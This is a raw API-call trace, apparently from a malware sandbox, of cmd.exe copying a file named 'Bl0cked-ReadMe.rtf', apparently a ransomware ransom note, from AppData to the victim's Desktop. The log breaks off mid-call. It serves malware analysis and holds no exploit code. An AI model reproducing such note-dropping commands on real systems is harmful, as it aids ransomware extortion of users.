lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.212] RegCloseKey (hKey=0x40) returned 0x0 [0225.212] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.212] srand (_Seed=0x5b8863b9) [0225.212] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"" [0225.212] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"" [0225.212] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.212] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4218d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.213] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.213] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.213] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.213] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.213] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.213] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.213] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.213] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.213] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.213] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.213] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.213] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.213] GetEnvironmentStringsW () returned 0x4222c8* [0225.213] FreeEnvironmentStringsW (penv=0x4222c8) returned 1 [0225.213] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.213] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.213] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.213] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.213] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.213] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.213] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.213] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.213] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.213] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.213] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fc08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.213] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fc08, lpFilePart=0x22fc04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fc04*="Desktop") returned 0x18 [0225.213] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.214] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f984 | out: lpFindFileData=0x22f984) returned 0x420008 [0225.214] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0225.214] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f984 | out: lpFindFileData=0x22f984) returned 0x420008 [0225.214] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0225.214] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f984 | out: lpFindFileData=0x22f984) returned 0x420008 [0225.214] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0225.214] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.214] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.214] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.214] GetEnvironmentStringsW () returned 0x422ae8* [0225.214] FreeEnvironmentStringsW (penv=0x422ae8) returned 1 [0225.214] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.215] GetConsoleOutputCP () returned 0x1b5 [0225.215] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.215] GetUserDefaultLCID () returned 0x409 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fd48, cchData=128 | out: lpLCData="0") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fd48, cchData=128 | out: lpLCData="0") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fd48, cchData=128 | out: lpLCData="1") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.216] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.216] GetConsoleTitleW (in: lpConsoleTitle=0x4108d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.217] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.217] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.217] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.217] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.217] _wcsicmp (_String1="type", _String2=")") returned 75 [0225.217] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0225.217] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0225.217] _wcsicmp (_String1="IF", _String2="type") returned -11 [0225.218] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0225.218] _wcsicmp (_String1="REM", _String2="type") returned -2 [0225.218] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0225.221] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.221] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.221] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.221] GetFileType (hFile=0x7) returned 0x2 [0225.222] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.222] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22fc40 | out: lpMode=0x22fc40) returned 1 [0225.222] _dup (_FileHandle=1) returned 3 [0225.222] _close (_FileHandle=1) returned 0 [0225.222] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0225.222] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22fc10, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0225.224] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0225.224] GetConsoleTitleW (in: lpConsoleTitle=0x22fa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.224] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0225.224] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0225.224] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0225.224] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0225.225] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.225] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22f5a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f5a4) returned 0x410e60 [0225.225] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0225.225] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0225.225] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0225.226] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22e4b0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0225.226] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0225.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.226] GetFileType (hFile=0x54) returned 0x1 [0225.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.226] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22e508 | out: lpFileSizeHigh=0x22e508*=0x0) returned 0x1632 [0225.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.226] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.227] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.227] GetFileType (hFile=0x4c) returned 0x1 [0225.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.227] GetFileType (hFile=0x4c) returned 0x1 [0225.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.227] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.228] GetFileType (hFile=0x4c) returned 0x1 [0225.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.228] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.228] GetFileType (hFile=0x4c) returned 0x1 [0225.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.228] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.229] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.231] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.232] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.234] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, 